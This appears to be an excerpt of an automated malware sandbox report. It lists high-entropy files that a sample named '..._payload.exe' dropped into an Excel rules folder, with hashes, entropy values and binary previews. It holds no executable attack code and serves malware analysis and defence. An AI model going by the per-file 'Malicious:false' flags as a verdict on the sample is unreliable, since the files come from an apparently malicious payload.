                                                                                                                                                                      Preview:<?xml.`.H.U.0..2.?."XT..|..~.#...&#....G.~c.@..(....B. .'<.XR..f....[3.p...o.H2c..(.4..r.,......D<.Z......T]..f...|Cs:...z.y.._........~6..1.uJU.A.m./=we.^&~.j.d.P.'.+....4...".A....P....^:Y.f..P....jl.Qgy5.....t...r..+ 0..c...I..@R.n..1..E.....{..T.@yC:pL.x....3.8.@g.[..2asSr....gx...b..F_.......tp..7r<E.;d..2.^....p..7...V...)*.b.uv....hF......}:.,}HW..N..!.t..].j.._.~...S5..0...JYa.....E.kZ.=2%..<..24..>..8|".?y.......2[.Y.5-.C.l....._..0KP....K..Ye..F.........."!.M..)N.Z...R{_...ep.-..H.T..E[......fe..b..cO....m=y5...9....=....n:.3...bl?.B.$.....H....n..*. .<a-....1.....n...g..SlE..%S....$1...gK.5.,q.9w..<.h~4...XI.15..z.`.y{>L...9.|vH..M...q...|w.vW|.rh._.y..~#........B..".i.3cY......U.Nq.{.2.2.1...SPO.u9.v]...`.....9.\.........\.eo.P_.u..$M...G>.%..jB........O....dM9).l.........P...h...$nJk..6...".]t.:y....y.N. ....#.....fx...c.HjUr.?.....t.......e..sy..1..mw......LKR....i.D.{....~..d...fq.6{....I]<"..H.......>.Y..D.i.8..i..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11210v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1311
                                                                                                                                                                      Entropy (8bit):7.852622207940032
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ryehP+uP2EV/TC2c1qdZOHjTisNQ1C3lXZQtkujJAC+tFCaI0KqDI3Nh2bD:ry9e2EvOHjTVeI3B6kTfKCIkD
                                                                                                                                                                      MD5:FC5A17D2B7AAEB2745EC07811EB2E34E
                                                                                                                                                                      SHA1:49D5DC8A248114A2202D3E6BE8E105BB632E845C
                                                                                                                                                                      SHA-256:BFD5590BC9968FF9AF019DA23BBA3EC6D4D8D1BE7124D9A486CCCA9CE775BA32
                                                                                                                                                                      SHA-512:DC61C34E6798CCACFED73506F51EFFCDD159D1EED3F369C122A706C43D395F7F842738DE7FEB963A1F728A329DF241C8231459610D13B7D1B28750FAE0633B5C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..b\*........J....i4...e......X[b.^..w.. .V..<s7K~...]...%>..$..%.......R+..*cE:.....E?...H........../..._........G.<....O.......hR...U...~....b_\./8...q....e.:t(......>{j...1..G....y.z'... ..q...mU.,.8nz.UU.cN5......uq..yz..K2.(..oh*...j.S..a&w0......)].f6H.t..Y.V4...[.7..Dd..o.h<;V....T=...Z....k..xj...v.7%..yn.Hf..D=.8..rc.[U..%R,.u[.-..'...,)-.I..@2Wr.a*<........V2{.s`r.;..o..T.x.......6.....ik..k..v8.......`W/7P..O..8>.......P..#9..t_O.9f....H...>.>.4... ....@~.-......V$..}..8?0..'....0u...\..........d0..bW:.U.h.6Y..3...G^.L..M........./v.J.....F...u..z.7n.F..|y..>\1C.Ty..LE.;.x'y.~....?..o..7.S..>R.[.5.dk........\.....X......J...E.)...>.2./.w.Z.V..pHL....t..i.oI..(..o..V.bG..G.....Mc+.Bu2*..."q..c..YX...u....\..]J!...>g.A=b....a.$6,+.?d..L.'.U.:....]@...;.....Fk.L..&._.E......"!.L.:..S<...j.{`]/d....5b.......-?=G.@.>%..?.d..{.......b..95..V.<Y....Y..6. ..7.o....W%b".4...s....%..o,@...^`*...&.YX....f.K...c9.......}....Io...{.<

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11264v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3172
                                                                                                                                                                      Entropy (8bit):7.9470758203773
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:A5uuDQpyIzWoyGkyEB7qQcKHmEZSqgUSQKNfc/N72PGt6RShdz11q3nO6D:A5urpltkye7qQcKdSqgxQSf+726hdzef
                                                                                                                                                                      MD5:FE0AC8B76ECD3135A81BFD49335711F3
                                                                                                                                                                      SHA1:4A9DE2C0DAF1372C63FCA16D91BA6DF08C01A1DA
                                                                                                                                                                      SHA-256:26364BF85559BEE631CBBFCE248C7E4B3CCDF9FF51F63906F76E11A2DF764AFB
                                                                                                                                                                      SHA-512:B6B2AF9DEE9734CB644AC9AE303252689F7CA6A73AD3CD0E76DE6341873D84D351C2B42622DF8171BBBAB83412F764B0AC4A05B7871A1E97C35A39C58D9F4789
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml2....2..e.:.u+JP...k.h.c..~@...nj0.O`.<Z7......P..N....B...$..q*'m.^.!.Uk.t..L..v...:YrK..C.1r.M.,...aV.........8.`............#...z/.@.?........I.GHL.b.p......M.g.b..r....0........./../q.,..n......0\......$..@.q......}j.}4.`.=J...|A...a.L.rPW.%..2.(rI.!3....H...x..=0.].$.........K.......g....._c.;)....*....8.."..h"=}@..E..|.....r....,...?.\.6..6.SM..Uf*.l+....o. X]..U..Z.. .@e.X5..,q.=VV...OhN"wo.J.U.7 ..D..Xf...)C........H.w+..s.h-....{.1Mn....d.....To6.!M..0..8*..R>.O.QuA<..*^A"CQ...@_q.4_..C9.......t...e......Y9..u,...$.WZ.H..{..;?...me........R..|:.).r.5..U.y.,...a.=.<.;d..$C.N'A.... .}..`V[Q8.S..Z..k,.p.-.J3...I6GL..^.^2.S.t....;.....'....9L,....".B.E.Q.n..w...f...j..).[..[.e./A.PQ.G...~..]MA.S:.5W....).h...?...L....$.....,.-U..'.._.....)W...@.......N.O.8w.....}e.-.W\.A.C*.n%.5.)./F.1V@j.q?-.~..@D_3.W.~d..b...dI.,...0.m>[..ak..Y r...M.:`l.-.........B..$....x..;..\..^.......D.}[n]M.]..}GGO>V..........|G...1y.@!.p....n..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11265v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2096
                                                                                                                                                                      Entropy (8bit):7.914772023346461
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:qQE6mHAlC2l56pfbq7GnMhRuelEsZiUXAnD0RvKSijT9vli283D:hE6mHAJ4bxMPvlENUXSD0KSQTvi28z
                                                                                                                                                                      MD5:77F086D431FF5951C090F7EB8964BE40
                                                                                                                                                                      SHA1:AB32F54123E9AFEA3252D9C240669EC6CC306870
                                                                                                                                                                      SHA-256:3DC35EDB6DB99D04D99F6E13A58220A1B8F7F54E964EDB095FC30FBB3C9680A8
                                                                                                                                                                      SHA-512:2F6DEF11B4985BFB24EBD3882D573687F8D585222850145C43C60E0C4E4D102C9B4E9470F2EC985C7D4054D5801E5D96ABEDC2A67581CEBDB2507A0E05DBA790
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...gE.........dFi..0...{...'-.<..F.J.'F.5,.r.._Fx...N...)V.\H.....|.S...A.9#%.#c)...X.T.....#9..@L..B.....V..k...F..\]2.D./..mq.`e.I(. ..h..l.E..d..F...%..Tb. .....8F.=...vg.f..U.....R.;iN.2..<..7x.u1$...A2Ur..zno.x...`u=..V.{....^W...X.p@.w..$..Wa.....7V..~\<...3...[s-.C..?.L..g.(.].c....%..`.!.9.e{.M....B.....k.%.."..9.n.:h...y.,].....u...G..#..l>......g...2...=kt .>......t..vd..>..3.j...q..f......t..m.R..8...."...E..cZ.Y.N.\.:.m..*d..P.'.6|.p7V...0`..t......$.JVs_a@Gy."..Q;.....I..=.{.#.Y.....#..'.!.....;....&.lAA..f....U......b.I'...;.%Snp..P..%.2....t....N..9..^d.......[WS...idN...H.*.TA&}Y.I[.>..b.'......P=..*r...........U....qz..8..z.sB=.A7.Hy...J...#K......F.3.E.}.S.!.G.#.X...2.n..dM..%.K..:9VtmNr...#K...-.=.c......1J...uB....o.2..W!..n..c..U.F....|..jT............g)Rk...~*)....t. R.....bi.p.X:..<D.jfY.;)...+.....]Mc}P.`...b........+...+..C...u...{q....&#../.W.....%..<....n..1Wd...D..D4....).O...L.."....0..@=.... ...Z..p.....y.}..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11285v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7525
                                                                                                                                                                      Entropy (8bit):7.974530195609979
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:d7/po85ZEAtelKh4WRiUdW4NDRnVxzgZWEHrjiuME0DEI:z3CwKWMU8MDR4ZPMEFI
                                                                                                                                                                      MD5:FEDFEFDE0CD4629F7D4BD15CE9855950
                                                                                                                                                                      SHA1:07DCD4378E6FFC98CBE6C635EA7EED82C7469B4F
                                                                                                                                                                      SHA-256:41B05422DB24BC4F2A37A0323A6BF724ADDE26DCFA758A0D97C708D6EA1E9773
                                                                                                                                                                      SHA-512:8ECDF9251A8D14879FB22CEA478B1CF743B937ECA45DADF9B0AEC298024B0B681CA40B41BB6E27740625AAD9744B720136939681C48F28500B789F5BC176F4B6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml#1-1P..g^..q6..'..:.S>.A=..T.>$.mY....A.O...:._K...RI.8U.z;z+..c.bv..s.#.....\-K...........k.t....*.........qM..7...f...T...%.._msA..).!T..4...q1....[YH&.2~..@A~..@.F.l.4|5@^5sZ.1..+?h...*VB..;.?u#.........E...qjB:...{..gD66...P.6....r.......>f.@...b5...B....l.{...J.....g..7..U.......H....t.e..1.p..r.D.2.& .~..E.!..|&.....As.*...T.xgm....>.L.....[.r{t.t...,|.4..e.Oc..KsL_]....]..?. ..\...@.Q...V...p..k.....A.H....!6.M.........u.......7..........S...&O..]fJ.>.4yy..Xafx..A[..[.wQ...*..7..2.u.b..w6..;B.....G..H.SE'k. .......w.9..Y....@.....Mct..F.fq..e.....>s.m...Z......~...m.....`..'.......6.*...ZOL..._.&e.....)...R.`$.l....7....e........N^.}x......].'...y.|...."..e..b..N........... .v...g.4.....N.....h.8+...^..Z.X.....7..B?.66....{`q@..C..~...9...W........7.W.%?).....5.v....{......g.4G'.f.e.3..'-...Vh......c..}_kdC.3...3...s?...(.!..`..Y..g.....^..NA.h.%n;..5....+B=0AU.w!D..........|...].xv.d6B.....X.$.!...)<\....tS.. d.....6@@.Vy<.#.D.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11289v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4197
                                                                                                                                                                      Entropy (8bit):7.960741427977364
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:5y0MCI+Twm2DcMozv3Zauuz8jCArmZt1uU3FR0vaflgJN4:5y0nfTt2D5ozPZauuwj8EUEiB
                                                                                                                                                                      MD5:A7F1A0295A755FD13C9C14C83A1A13CF
                                                                                                                                                                      SHA1:713415F986D33949CAA290DEBBD3D953127B3E3E
                                                                                                                                                                      SHA-256:EF4E7B76B2FE72519D1C4A996E9ADB78009D47BD081C41DA6C33CA24FCD230E6
                                                                                                                                                                      SHA-512:D530EA0BF7E2F7D2144B2E109B5ADC482CC003E99C0F11B6AAD3745E90A26ED77C0FA4B5F7A72A0AA094D57A4BC9E3CD99C6973066E8A3F80FB2FDC2718CD4C8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.[.-^.nd..3..b.._*..l....L.t....i...M./.]8.$....C..h.N./Gc....G.e-...T....~K....}hD...uT.4<s.zQi.N..N..B...<..e.[.m.p`..$W~.k..Z54k.^eC.(z..'.....Y.6.....sC...Tl.H.R.>..T/P.....sF.....|..R....#M.........uE..E....=&...........Vp?.QN.?..9.......#S[.7.an..c=..2...!.I...5e4./G..6.7.5...#......q8.>2I.t.........I..2$.%.O...y.7...W2|.T.~Nm...i?.Y\.rR.kY..9L{...>x.......v.)...b#..~oU....Y...S..:6.c.t........>2.j..2T.ew..h....q..C.0.Yd...bWv..6...Kzy.w..../?.#.....U..4G%....t{m....N.8.n.+....*..t..1A`.T....?..H..#.H..@.9.:.k..).hD.:...O...8k../q....u.j..A.....2".`.."..x.A....fP..?..;{...>y....e...y......@..%..9.........9...dt..qa..5..m9..@PC..:..\.R...s...^...2..-.8V.0...~..`...Y.]1E....z...'.....v.....u.q.....P=....%&.&.\.....$..`..Qd.......]...pm...g%..)...J^o^HhT6...\..0..$VS.58WSRL.P..9]....<v....KB..o#P..)B-........HX<h...*.Q/..#..-.......-....%Z.........-.ry...]u....y...Ou..*..qx..^....b.ss.`.D-.Kk.J..^........mp...#W.k...r..y..l..O..q..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11300v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4608
                                                                                                                                                                      Entropy (8bit):7.9595444598051825
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:I5KZ3j0dWhN82g1FG8HEbiurfAG/dVvIv6Paf6AQtZzVVM24QHMW:IU3j0dWn8QDLrfHvv9tZzVVM/QHj
                                                                                                                                                                      MD5:0B49ED34DEDBBF8143A5455E3338DE86
                                                                                                                                                                      SHA1:B4C29F61F2C744DC036A119D3C802959E0BDD97D
                                                                                                                                                                      SHA-256:00DE5EE4C55366C93FD301AF6C471360F5A56EF4A7107F91F789461B1CE063F7
                                                                                                                                                                      SHA-512:58099F224741219685D848D2C5358ED7BD8B3E011985BE945B86E1EA4F3CF422B86D0FD9E994ADBF310F29E57B9067A433E82EC0EE8E89E4771DDFD8AC50E340
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.v:.V..v..T.5...^.....w.H..?.#.....zi...3....G/....'....X..|!s...P.|...H.v...Z.2.J..1....I^*v.vl~..\.M.l..a....-r.......J.;6M..rk..+(...~.%.4...n...d..g... .v.=.b.......]..D.e..`u.........i../...0R...u...'I3.\w.Z....+ .. .)D)T..N..G.n.pF."...qk..B....k......(.K7.H..Q.,....b.....y.7B.G.E.I9....g.$...NA.n..d#.r.]......fE....R..<..;...7....=..UA.....,..G..*`...vc....rBQ..=.rJf...*U.B.Cv.q..IJ..M.xt....'......A.%6.....H.5{'.1[.....f.1.r.$.....@.......5...U:.J..6..#.Ye.XZyx.....H-.|. .R.$A..`.a.....4 ......Z.q=...~.!..T.....K..;.w.1.B. .;....d.;p...k;L..9.W..x.d.^....1?a;.c.|5.O2............o..^cU..X.y.S......CC.4.,....M..U.y....R{._..Br..o....6..fy.Wq.l5.j.3...\.xs..Q..2q1}.t.r.........,....%^h.......dC3F.......v..~$.....(..,.o..V.....vh.....a.MY.T.6.....;?..|.w..g#. ..h.09t.A...X.<.8.=....uG.......,l$...|&OgEy.A.r0vVqa..........O^..B4.....A}\.f....J/..P...c...dl.x.O.....$....oJ+..w.H..}...W..3.*'..%.~.6A=.{..........I.....}.B(...H.@

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11302v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2884
                                                                                                                                                                      Entropy (8bit):7.9321910867576415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:jWn7T8ShiD98R8QJOcLCwBAMhitRqatAE/20p3z5megLAVcvT5ZH8Soz/tD:S7ISK98R8qOcLCr/jntAE/2KDszLCcvA
                                                                                                                                                                      MD5:F78213158ACB5AC502E5097D5510EEC1
                                                                                                                                                                      SHA1:710394987CF5A3259C224D546C40C82F4DF5A03F
                                                                                                                                                                      SHA-256:0554B1094301AE86DB82CF083D382AFFDB1F25F2535E98773B542129B018F263
                                                                                                                                                                      SHA-512:06E12061841B87B4392625759BD9CB9E7508F0C66E230004758534D9DFE2886F59E846E269D416B0A0239E3016D9A774EE580664DA7981870CD918DEB7509241
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml|..+.L[..Ve....._!(...y)u.r>s.4.pVO.C.r...<...G....`..*K..w.z.4Y.j^.H'#..1C...r....=..C...'.'.Od..._..G.n..]..x+9..h{....+..m.w.."..U......-.S.Z....k..1.r....zB..Wq....r..1C.....A......._..b..h.c.o`j'.+.s6...F.3.... .M.3..N_......O.S.~..V...N.7..+......z i..bdJ..T.;k..s.S..ZS&....!...';y5..}G....q..=S..!.....ph.3.. =W#...I....`.....8n...`.\0....a.#9.W..<..f.&>..@.$...?B.).|M.....y.n.c%.....o....=**....f.....m(._k[=...x...q.*...G.....^.WR..3.w.pX-xYy...77.l....... .PmV..y......fuY.3.6....f...J.-...A.ML...1Oso.....\...>.)FT>.#..... .R...N.]....\P...6..R.z...W.r..M.:...i.e.j.c..0JQlXd.r.5o.+.......V.P'H23t}....?.....g...nW.....we....9....[. ......R=..M....l..\.......A/.#......#]..a.g...W....;.w2.....3.\..x~.....w=~-p.).no....>+p.!....I`...Z..H.....'H..I2..#.......T.>h..2.R.....L.R^.U*EO.Hu..%E.s..._..........<..Z=..+=C...*0=.....2R...%..1.,m..Do..~....A\.S..Xg.&..=H}=...D..J3VAV..Zo..v.."zD..q..T....).f.@ba.u-. .........Mc..nj;...3.(.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11362v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5842
                                                                                                                                                                      Entropy (8bit):7.9661387682092935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:GlVEfNOgNoaYHrDV2QRljuEthc4gNf0i4j0jLKWHiz+1lOU8v6u7C3xtQ86ZN0DC:GKcZ712Q76Eg0i4APKWE+uU8vZC3xtQv
                                                                                                                                                                      MD5:31331F7DDDA4F17B1DFC2B0A4A884BB3
                                                                                                                                                                      SHA1:D1FB75831735FF1A73C325FB08B82B331A616F74
                                                                                                                                                                      SHA-256:61ED78F0F70E9D5A6C87124D1254C8E1D18FD09C8F88E95CD6881F89B3303F0A
                                                                                                                                                                      SHA-512:C829D35244BE0D51A88082D38ACA386F39CCDC700C076C8AA3AD36D0EC20D603A17967E325CB7DDDD2F1E90AEDCA6CBE324B87FD57280E56B222DE83D8B22140
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..}......y...H..h...%..).]]....v/.g..F.Jz.!.......T..m......$..X...t!.'D.....Z$eX.'...>R..G.3Ib..j... .W@E..i6.\Z..].o...'1.v....`...,.c<.A.._..ZC.j&.....+...Oq\..78...f|..\..S..F.,.PJi.......J..I...$W...d.L.<d#.x......^C..r..r.K.$.P.)~.R....=.=;.(K.y...{1.b..-.q_.....S..(:..0........."J....{gg.].I#...P...?`..u..$..H-..P.....6..."d....P..n.(.W.f....]Rh.7p_.P.Q....R..u..C..S......*...M..t5..6`a....m*=.EW.wOn.9.A...F.......Q4.,/+.[.G<%9.|..;B.....m'..B..kc..,.1`.nz.[S....6.....J_..#ke.z>.zSr..V..x...1<.:......Y.(....I..2.y.{........b|......6#gP...AW..~..c.....2.U.[.(.4/...TI..`....#.....dA....Y|P......a.....P+Zd?...2......sLx.$.B7...P......q.......P......t..U....TB..I....5.......\>...........+.....gE4..z...&.4A..J.Z..p.A.....*1._.2#7:..t.Q....._w-bK.._3...c..Z...k..r...>....h..m'.H~m{......H.M.X;....!..9hM..g.?.{fi.n.z.M..0..|...g.C....K...J.6(..U....zY..........:Pf$.....*g.$..bJ.E..j+..qH....s)g4.S4r.a.}..m..)M.f

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11369v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2023
                                                                                                                                                                      Entropy (8bit):7.893812757704743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:qAZaQipK6Z4EI7Oa2NgljrM0jfrkJ7sIYh+v/liDMD:fk5Z4EI7+uoAfYuIYhEliDo
                                                                                                                                                                      MD5:9CD1F73C472E6E069B7D2F9A8E9D45ED
                                                                                                                                                                      SHA1:CCA988F6C84DBA84F0B157AD46391A081FC3620F
                                                                                                                                                                      SHA-256:14602063EC118CA55C7E77140BE8694779794841C3C642AADD9A8C3C2979E67A
                                                                                                                                                                      SHA-512:3F26060CB7348545D695EDF08931664EA57993294BE456C5558E60523F831F67CFEB888DA4D65DEB453685BF8E2C69B8FA252F2B3B4EA630B0F601B87065E20B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...@....^..H9$_/.$4......j.@...c....y3...j,.@l._.?......;......!..*...q......B..?.0.~...f...R9E.N.9.'6.C{.UV.X..I.Y...K,.....7.......B..Ro+Y.G..p.C.].....EJ..._....-....j.......9%/.....{.....w..Jn..H..J..=..X........(.#HwY.N#...+.B.m...U.9.:.hq.....<....C..f..]..c.-...B..........&.......C.)-3.*.+.........Es.l...."0^?t....C..........PD.8_..r?.NX.l....8...MQ.,.b..%YUg+...9m&....y.Z..N..l`...Xl.nelB......5..oZy....6.Vl.!.@.<G..IS......+:H\V$....q.....Q>.`}..>..8.......b`X.b.c......f...4.C....F..F....3...........7...M"..D^..:-Fe..1......].[.$H../........,.?.Gp......V...1h.:....'.i.3/O.`c.H........28p...h......v.J%..:[.`U.=.F.x..9...M.....2..}..TFmY.\R. ...1.S.....^V.....S.._^.0...h......h^...%a...P#M1a/...i.E..7..Ro......~3p.9=%....m...*..t..FQf-\S)..V.;.N...n[.`.V[|.w~.-&..x..+.I8G;?.DT.........Y]...>......)E....x.b[.......c;....X.R...)..../9.c[.@u.b.B..j5..ND.o..(.vx.#e.w.~.......i..o.G=...Sx.5=~3%...)..+...~ .<Si.......v*.=.4Y.......3

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11370v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1001
                                                                                                                                                                      Entropy (8bit):7.801519854968107
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:y/8nl+EhZha/WB3uF8N5Y9SZvXxDrfGyZvCLljqhPxxmnNarjbZs2bD:jTEiYkxFkLljqlLmN6Z/D
                                                                                                                                                                      MD5:46E6E7517794F33ACE31E3210BCCE2F3
                                                                                                                                                                      SHA1:9C452EB9F4C1E06D0C7ECE71ABC5E015F03F4F20
                                                                                                                                                                      SHA-256:0DE11159B158D505EC37460FF759775A5125F80DC1795423A5ED3A46A6C02143
                                                                                                                                                                      SHA-512:BC851C78267D9036F8668957D2A9BCFF41B3ADA6742A1614EFB43C04DA5A6CF66EA0BBC7861E2FAED1B9045F90F45B6407A81F1C4ECEB43A452CEBC0B1A5A644
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...I5..+>."S..w.f.vH.>bS}z.6..wwjS$.....s..#@a\..v..%.'.]XE.,.@.9.[...o[Q.f/.~.x.....H.@.g..-.%'.g.q.&..p(.c.~!....A.X..#|.... ..U.ae...8....I0G>.^">eB...K......i.. nj...;...G.#./...&....1.,..[.....V....c..s..b...r.-..H...0.7...\........0.T~v].w..?....@..z7.G8..0.........5.......d8....u...bO....%.Tw....k...7...gF...o....'.gk.......ywz>.y.......|L...G....o.m.......'..(quP.c.l.0..w...LH.GF6.u..j[.M...0.x..!.....7.._....7.dk7OzHQ&PD"R....Z..x.6.......5......7.&.N.......k.`........CS...p!U...n....w.. .&...(...'.Y|..\.,..w}...)...y.9...^.G..$.._.l`By..0...;.D..h.......Zf{..v9..n.X..z10..$V...5.B.Z2..%.:c..%....:.R......5.....$....I^..""a\.....N....hr..4.`..DH..(.6>..g.@. \......j.#:b...{&..i.21.p......v0..F....&}...J...4/...u,.ar..~..(...p... l..B .f.....y.`Ud......0.2..n....|.-.8.o...ii..."..._3..v....+.:..?...Z.U..^}k.....W..J...W..3.M.....O#l..[u....Jx.i..Cg...u.l..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11381v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2743
                                                                                                                                                                      Entropy (8bit):7.921528490423761
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:9T/2MjnXAqJeYL+7Sb7PCgyTDYh43xvxIMsN+MiJX8GBEWoD:9VjTPYsKbD+ivyMsxaMt
                                                                                                                                                                      MD5:297F0F2A2006B3416765E81698C85F89
                                                                                                                                                                      SHA1:0FC641D97142F75739EA9EE2030B7EEA614877A5
                                                                                                                                                                      SHA-256:6BFDF4A839485C37D39DC6BD4DA1432E2ABF6FB1D7D855EC55BC4CF5E80FB449
                                                                                                                                                                      SHA-512:0D619AE1A42660F12874D4CFB48D62EF3A216F817EF40B9155CF9D30D5CEEDF38EA1E0FCFC9E575D67E9808865958472D4E3899ED736B457A8F88D8DA800E36F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..O.G..2SU.y.QS..i.hy........f..mse..'.T..B.g.,!.j.E._A..k[.k.}4.6........"m.d. ..NBn_.A..f..["^j.L}._af...Y$....&.p..m..`h..4Ff.Z.B.p.T.e....G.Dy.}F.0.sC.s\`;.................;&.f.0..kRz....Gx.!R..T...5....".p$.n.....ys.a.=........a8.........J.....2=...6...7...).3....yH....6>J...G?.N.I.P...._}.S7..h-r.......^.Ra.Eivg...-...q.J....<.....D}.j4C..G-h.~...Q-..Uot1..}.b~.a7...;....;...t...u.<..Qn..P.y..nq*...:.S.....!.Z..5:.".H....q.....|).....T"J.&.&P.[..+..O.E....n.........0nN....M..2.x@.v..$u.d...7..D....*.p.[>..........(6e=JQ8.....g..8L.....o.J..QA....$.X....os.........C|.Z.DG.....x.+7'v.m....s..6.=..=c...tn.....A.'.W..|.z..B.9....{e.+Up..b... ....vv..E^6.\......./6*%................au.-y.'..V.2..p...&....a.6...].:O....h|..........iO...PP.L..s.......YXr..n......l#....D1.)....Y....2T.!......f..v..kL|6..H@.....K@......*.i..u......?b...$.k..2...M..X.*~,s.....6.8`...:....K..I.~...DD.M6.{6n.H.......n..c.JL.t".3.F.....e ..W.....M.....{.. Q..PY>k.a....o...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):11063
                                                                                                                                                                      Entropy (8bit):7.981230980077508
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:EZBS/FrC/KAwCOIAqkzPNqNYyoOa1bPgX7qP68Nw9QxPBVUQrdFGYJgQJTiVuf2m:DFrC/K+OIAquqr1UbPgX78YABVUUdF9p
                                                                                                                                                                      MD5:E975595DC408B1551D16DBB0A2089C80
                                                                                                                                                                      SHA1:E847F098A38E59444BC263755EADA3EF4E2BAF69
                                                                                                                                                                      SHA-256:4EDCDB0BF1C621789E923129590978127D3A32EE1C98DA97C9A7DE90EA067165
